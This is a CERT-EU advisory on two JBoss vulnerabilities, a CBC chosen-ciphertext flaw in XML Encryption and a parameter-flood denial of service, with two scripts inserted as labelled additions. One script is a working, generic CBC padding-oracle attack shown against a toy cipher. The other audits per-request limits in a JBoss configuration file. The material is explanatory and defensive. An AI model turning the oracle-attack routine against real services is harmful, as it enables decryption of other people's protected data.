-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Reference: CERT-EU Security Advisory 2012-0123
Title: Multiple Updates on JBoss Products [1]
Version history:
16.10.2012 Initial publication

Summary
=======

1) An update for the JBoss Web Services component in JBoss Enterprise SOA
   Platform 5.3.0 that fixes one security issue is now available from the
   Red Hat Customer Portal. [1]

   CVE-2011-1096
   CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) [2]

2) JBoss Operations Network 3.1.1, which fixes one security issue, several
   bugs, and adds enhancements, is now available from the Red Hat Customer
   Portal. [3]

   CVE-2012-0022
   CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) [4]

Vulnerable systems
==================

1) JBoss Enterprise SOA Platform 5.3.0
2) JBoss Operations Network 3.1.0

Original Details
================

1) An attack technique was found against the W3C XML Encryption standard
   when block ciphers are used in cipher-block chaining (CBC) mode. A
   remote attacker could use this flaw to mount a chosen-ciphertext attack
   and recover the entire plaintext of a given ciphertext by observing
   differences between the SOAP (Simple Object Access Protocol) responses
   returned by JBoss Web Services. (CVE-2011-1096)

2) It was found that JBoss Web did not handle large numbers of parameters
   and large parameter values efficiently. A remote attacker could make
   JBoss Web consume an excessive amount of CPU time by sending an HTTP
   request containing a large number of parameters or large parameter
   values. This update introduces limits on the number of parameters and
   headers processed per request. The default limit is 512 for parameters
   and 128 for headers. These defaults can be changed by setting the
   org.apache.tomcat.util.http.Parameters.MAX_COUNT and
   org.apache.tomcat.util.http.MimeHeaders.MAX_COUNT system properties in
   "jbossas/server/[PROFILE]/deploy/properties-service.xml". (CVE-2012-0022)

What can you do?
================

A fix is available [1,3].

After applying the JBoss Operations Network update, verify that applications
which legitimately exceed the new defaults (very large forms, many custom
headers) still work, and raise the limits explicitly in properties-service.xml
for those profiles rather than removing them.
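The chosen-ciphertext attack in item 1 above, as a simplified added example that is not part of this advisory or of Red Hat's code. The real XML Encryption attack uses the server's acceptance or rejection of the decrypted XML as its oracle; here a PKCS#7 padding check plays that role, and a toy Feistel cipher stands in for AES so the script runs with the Python standard library alone. The key, IV and the SECRET payload are constructed; the attacker side sees only ciphertext and the oracle's yes/no answers.

```python
import hashlib
import os

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy 16-byte block cipher: a 4-round Feistel network with SHA-256 as the round
# function. It replaces AES only so the script needs no third-party module;
# the attack depends on CBC mode and the oracle, not on the cipher.
def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, r, rnd))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    padded, out, prev = pad(plaintext), [], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)


def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    if len(ciphertext) < 2 * BLOCK or len(ciphertext) % BLOCK:
        raise ValueError("bad length")
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(xor(block_decrypt(key, blocks[i]), blocks[i - 1])
                     for i in range(1, len(blocks)))
    return unpad(plain)  # this ValueError is what the attacker gets to observe


def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block from the oracle's accept/reject answers only."""
    inter = bytearray(BLOCK)  # block_decrypt(key, target), learned byte by byte
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        forged = bytearray(BLOCK)  # attacker-chosen "previous block"
        for j in range(pos + 1, BLOCK):  # known bytes forced to decrypt to padv
            forged[j] = inter[j] ^ padv
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:  # rule out a longer padding (e.g. 02 02) hit by chance
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted; responses not distinguishable?")
    return xor(inter, prev)


def padding_oracle_attack(oracle, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                         for i in range(1, len(blocks)))
    return unpad(recovered)


SECRET = b"<wsse:Password>hunter2</wsse:Password>"  # constructed sample payload


def demo() -> bytes:
    key = os.urandom(32)  # never seen by the attacker side
    ciphertext = cbc_encrypt(key, os.urandom(BLOCK), SECRET)

    def oracle(ct: bytes) -> bool:  # models the two distinguishable SOAP responses
        try:
            cbc_decrypt(key, ct)
            return True
        except ValueError:
            return False

    return padding_oracle_attack(oracle, ciphertext)


if __name__ == "__main__":
    print(demo())
```

The fix is to stop the decryptor from telling the attacker which of the two failure paths it took (the Red Hat update) and, longer term, to use authenticated encryption such as the AES-GCM modes added in XML Encryption 1.1, so a tampered ciphertext is rejected before any plaintext-dependent processing happens.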
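A check for item 2 above, as an added example that is not part of this advisory or of Red Hat's code: a script that reads a profile's properties-service.xml and reports the effective per-request limits, flagging any that were raised above the update's defaults. The MBean layout (code org.jboss.varia.property.SystemPropertiesService, a Properties attribute holding java.util.Properties-style lines) is assumed from JBoss AS 5 conventions, and the sample file is constructed.

```python
import xml.etree.ElementTree as ET

# Defaults introduced by the JBoss Web update for CVE-2012-0022 (per the advisory).
# Note: if a property is absent, this default only applies once the erratum is
# installed; an unpatched server has no cap at all.
DEFAULT_LIMITS = {
    "org.apache.tomcat.util.http.Parameters.MAX_COUNT": 512,
    "org.apache.tomcat.util.http.MimeHeaders.MAX_COUNT": 128,
}

# Constructed sample of jbossas/server/[PROFILE]/deploy/properties-service.xml.
# The SystemPropertiesService MBean layout is assumed from JBoss AS 5 conventions.
SAMPLE_PROPERTIES_SERVICE = """<server>
  <mbean code="org.jboss.varia.property.SystemPropertiesService"
         name="jboss:type=Service,name=SystemProperties">
    <attribute name="Properties">
      # lower the parameter cap for a profile that only serves small forms
      org.apache.tomcat.util.http.Parameters.MAX_COUNT=100
      some.unrelated.property=value
    </attribute>
  </mbean>
</server>
"""


def parse_system_properties(xml_text: str) -> dict:
    """Return the key=value pairs declared in the SystemPropertiesService MBean."""
    root = ET.fromstring(xml_text)
    props = {}
    for mbean in root.iter("mbean"):
        if mbean.get("code") != "org.jboss.varia.property.SystemPropertiesService":
            continue
        for attr in mbean.findall("attribute"):
            if attr.get("name") != "Properties" or not attr.text:
                continue
            for line in attr.text.splitlines():  # java.util.Properties syntax assumed
                line = line.strip()
                if not line or line.startswith("#") or "=" not in line:
                    continue
                key, _, value = line.partition("=")
                props[key.strip()] = value.strip()
    return props


def effective_limits(xml_text: str) -> dict:
    """Effective limits: the explicit property if set, else the update's default."""
    props = parse_system_properties(xml_text)
    limits = {}
    for key, default in DEFAULT_LIMITS.items():
        raw = props.get(key)
        try:
            limits[key] = int(raw) if raw is not None else default
        except ValueError:
            raise ValueError(f"{key} is set to a non-numeric value {raw!r}")
    return limits


def audit(xml_text: str, max_allowed: dict = DEFAULT_LIMITS) -> list:
    """Names of limits raised above max_allowed (a larger cap re-widens the DoS surface)."""
    return [k for k, v in effective_limits(xml_text).items() if v > max_allowed[k]]


if __name__ == "__main__":
    for key, value in effective_limits(SAMPLE_PROPERTIES_SERVICE).items():
        print(f"{key} = {value}")
    print("raised above defaults:", audit(SAMPLE_PROPERTIES_SERVICE))
```

Run it against each profile under jbossas/server/ after the update; a profile that needs a higher cap should show up in the audit list deliberately, not because the limit was silently removed.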
What to tell your users?
========================

N/A

More information
================

[1] https://rhn.redhat.com/errata/RHSA-2012-1330.html
[2] https://access.redhat.com/security/cve/CVE-2011-1096
[3] https://rhn.redhat.com/errata/RHSA-2012-1331.html
[4] https://access.redhat.com/security/cve/CVE-2012-0022
[5] http://cve.mitre.org/

Best regards,

CERT-EU Pre-configuration Team (http://cert.europa.eu)
Phone: +32.2.2990005 / e-mail: cert-eu@ec.europa.eu
PGP KeyID 0x46AC4383 FP: 9011 6BE9 D642 DD93 8348 DAFA 27A4 06CA 46AC 4383
Privacy Statement: http://cert.europa.eu/cert/plainedition/en/cert_privacy.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBAgAGBQJQfXRhAAoJEPpzpNLI8SVoGXoP/0EjDwfT3DKk5d6WuglnmTv4
ruH02a0PB9ZP2hJpkiAB34pL3mBfvXsQbBAJxwGD7hjkv2NPjgjgFH9SVO+8DZEX
XModo8cf7MxoRNY4HBV0tUJpIrj3g9FsbazC2iNNAxu5niNiPxYw+2dr15y85RFp
VJnW3J7CFxfAiihB+HWBBMq1Uz1xJzXGZh/fRw1QYt9JGMX4dNLtIxls0ckZCRNw
Q1+4pjT+qR3oEeh9kzBQmrD+Esb9TXkWbtlWQiVl26hUfz/tIGvxyUl9sG+9NEiS
r7rnUsUIhKKhQb8SqnB3zASiebpjLf7uMkBrTAAz1NB/wJTCGW6QTzAHS4tVSE4A
RvhM6tesKMJtDXcFr95VuMSV+55KaEAe6aENSYwVdpb3f6p7FvxnrmFSOAm23BvV
ymgv7kI3pkbjmbWxkceFJKJF1P0DygefOxhR6Mr1GkwzIF8mU2C+WSf9Qo6MxvGF
xi6eWI/DXOgWQwrN3GoG60TkhU4cCre5lZ3p5s8DJLrImq41nCnKA904CV3PpiXs
4X2CUZyNZgUFTYEtnOXBAhmT9sbp/yQkKxWRH6qJ+QnR7dPvTzwk8LglLz3tj7zA
+f5AXUU9ha6hKhxQ6iZ7AVrch72ATgYYbJOL4umLV1AG2288+G6WWFXUDa/bDP7z
eoeW+E4IJP3o4Pk0i0pb
=ouFb
-----END PGP SIGNATURE-----